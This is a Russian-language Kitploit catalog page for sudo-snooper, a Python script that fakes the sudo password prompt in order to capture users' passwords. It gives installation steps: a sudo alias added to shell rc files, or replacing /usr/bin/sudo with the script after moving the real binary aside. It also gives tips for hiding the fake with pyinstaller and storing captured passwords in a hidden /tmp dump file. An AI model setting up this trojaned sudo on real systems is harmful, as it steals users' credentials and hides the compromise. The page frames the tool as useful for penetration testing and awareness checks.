Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
sudo-snooper — Python-скрипт, имитирующий работу оригинального бинарного файла sudo, чтобы обманом заставить пользователей вводить свои пароли. | Kitploit
Инструменты/GitHubGitHub/xorond/sudo-snooper
Инструменты фишингаАтаки на ПаролиТестирование на ПроникновениеСоциальная инженерия
GitHubxorond/sudo-snooper

sudo-snooper

Python-скрипт, имитирующий работу оригинального бинарного файла sudo, чтобы обманом заставить пользователей вводить свои пароли.

Репозиторий
70346 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

sudo-snooper

sudo-snooper ведет себя как оригинальный бинарный файл sudo, чтобы обмануть пользователей и заставить их ввести свои пароли.

Он покажет поддельное приглашение, точно такое же, как оригинальное, для ввода пароля sudo.

Это может быть полезно при тестировании на проникновение или оценке безопасности для проверки осведомленности пользователей.

Шаги по установке

Вариант 1 - Алиас команды sudo (проще, но более заметно)

Этот вариант проще в реализации и более переносим, однако может быть более заметным для внимательных пользователей.

Отредактируйте .rc-файл оболочки, которую использует пользователь (может быть .bashrc, .zshrc и так далее), и добавьте следующее:

root@kitploit:~
alias sudo='python3 /path/to/sudo-snooper.py'

Убедитесь, что sudo-snooper.py имеет правильные разрешения.

Вариант 2 - Установка вместо настоящего sudo (сложнее, но менее заметно)

Для этого варианта установки требуется root-доступ

Это становится полезным только в том случае, если у вас уже есть root-доступ, но по какой-то причине вы не можете взломать хэши из /etc/shadow. По сути, вы можете выудить у пользователей их пароль.

  • переместите оригинальный бинарный файл sudo под другим именем
root@kitploit:~
# mv /usr/bin/sudo /usr/bin/somename
  • измените параметры в файле по своему усмотрению

Измените следующие параметры в sudo-snooper.py:

root@kitploit:~
dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
  • установите python-файл в /usr/bin/sudo (или туда, где ранее находился sudo)
root@kitploit:~
# install -dm755 sudo-snooper.py /usr/bin/sudo
  • дайте необходимые разрешения python-файлу

    Вы можете проявить фантазию и сделать файл исполняемым, но недоступным для чтения пользователям, но я не буду в это углубляться. Ознакомьтесь с некоторыми ответами здесь по этому поводу.

Примечание: Более убедительный способ установки — скомпилировать его с помощью pyinstaller, чтобы он не отображался как python-файл при выполнении file /usr/bin/sudo.

Для этого в Archlinux: pyinstaller --onefile sudo-snooper.py сработает. Однако имейте в виду, что после компиляции вы не сможете изменить параметры в скомпилированном бинарном файле.

Использование:

После установки sudo-snooper можно вызывать точно так же, как обычный sudo.

Например, выполнение

root@kitploit:~
sudo vim /etc/resolv.conf

приведет к вызову sudo-snooper (при условии, что он правильно установлен).

Он запросит пароль пользователя, а затем выполнит команду, перенаправляя ее к настоящему бинарному файлу sudo, если пароль верен.

Затем вы можете получить пароль пользователя, прочитав файл дампа, указанный в настройках.

TODO:

  • обработка случая, когда пользователь вводит неверный пароль
Скачать инструмент